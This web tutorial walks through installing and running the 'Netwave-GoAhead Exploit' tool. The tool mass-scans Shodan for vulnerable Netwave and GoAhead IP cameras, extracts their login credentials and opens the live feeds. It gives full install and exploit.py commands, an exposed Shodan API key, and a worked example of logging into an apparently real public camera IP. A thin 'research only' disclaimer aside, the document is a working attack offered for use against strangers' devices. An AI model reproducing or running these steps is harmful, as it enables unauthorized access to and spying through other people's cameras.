How to use Netwave-GoAhead Exploit to exploit security camera vulnerabilities

In the lesson “Exercise: Using ZoomEye to access Cameras with vulnerabilities CVE-2018-9995” we can easily find many cameras that still have unpatched vulnerabilities. However, there is still a Tool called Netwave-GoAhead Exploit that helps find another type of Vulnerable Security Camera.

About Tools

This tool was created and developed by Kien Quoc. The tool has the main function of finding IP and checking 2 types of Cameras, Netware IP and GoAhead, to see if there are any vulnerabilities. From there hack into the camera and view the camera through your Browser.

Instructions on how to use Netwave-GoAhead Exploit

Note: the article is for research purposes only, it is strictly forbidden to use it for illegal purposes. In case the camera is found to be flawed, please notify the landlord immediately so that it can be quickly remedied.

Install tools

Step 1: Update your Linux and install Python 3 and Pip 3 for me

sudo apt update
sudo apt install Python3.9.6
(The latest version since this article was published is 3.9.6. You can check it out on Python’s homepage!)
sudo apt-get update
sudo apt-get -y install python3-pip

Step 2: Install Netware-GoAhead Exploit tool

sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits 

Step 3: Go to the file and install the necessary packages

cd Netwave-GoAhead-Exploits

pip3 install -r ./related.txt

Register an account in Shodan.io

Shodan.io is a search engine that allows users to find specific types of computers connected to the internet using various filters. In this article, Shodan acts as an ip finder and filter for you to see which ip can be attacked.

Step 1: Go to Shodan.io here

Step 2: Select SIGN UP NOW

Step 3: Select Register in the upper corner

Step 4: Enter login information

Enter your Shodan.io login information

Step 5: Go to email Verify with Shodan.io

Step 6: Go to account.shodan.io here.

Pay attention to the API key

Shodan API key

Find Vulnerable Cameras with Shodan API key

Enter the following command

python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]

My example would be

python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0

run Netwave-GoAhead Exploit

It will run as follows

Run Tool

The task you just need to wait when it gives such results

Camera search results

Now I will try to log in to ip address 181.56.97.61 with port 80

Enter username and password

It will prompt you to enter your username and password. Just based on what the tool says

An example of this would be

  • Username: admin
  • Password: 123456

Result

Camera hacking resultsCamera hacking results

Sometimes you will encounter some cases like this

[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />

For this ip, please help me remove it because it is not the IP Address of the Camera

Access Camera using available IP

With 1 IP address available port

You run yourself the following command

python3 exploit.py -b 1 -i [IP:PORT] -v

For example, I have

python3 exploit.py -b 1 -i 192.168.1.5:80 -v

Inside

IP address is 192.168.1.5

Port is 80

With IP list with port

Use the following command for yourself

python3 exploit.py -b 2 -l iplist.txt -v

Inside

iplist.txt is the file containing the ip address in the form: [IP:PORT]

Eg: 192.168.1.5:80

Target IP : 192.168.1.5

Port aimed at: 80

For this way, it will be easy to attack on an address that you already know or if you have an IPlist available, using the following way to check is a very effective way. Using Shodan is also possible, but it will check many strange ips that have been published on the network.

So I just finished the tutorial on how to find and attack the camera with the Python tool. If you have a good article, don’t hesitate to send an article contribution via email anonyviet.com@gmail.com, we will edit and post. See also: Exercise: Use ZoomEye to find the vulnerable Camera CVE-2018-9995 here.

Leave a Reply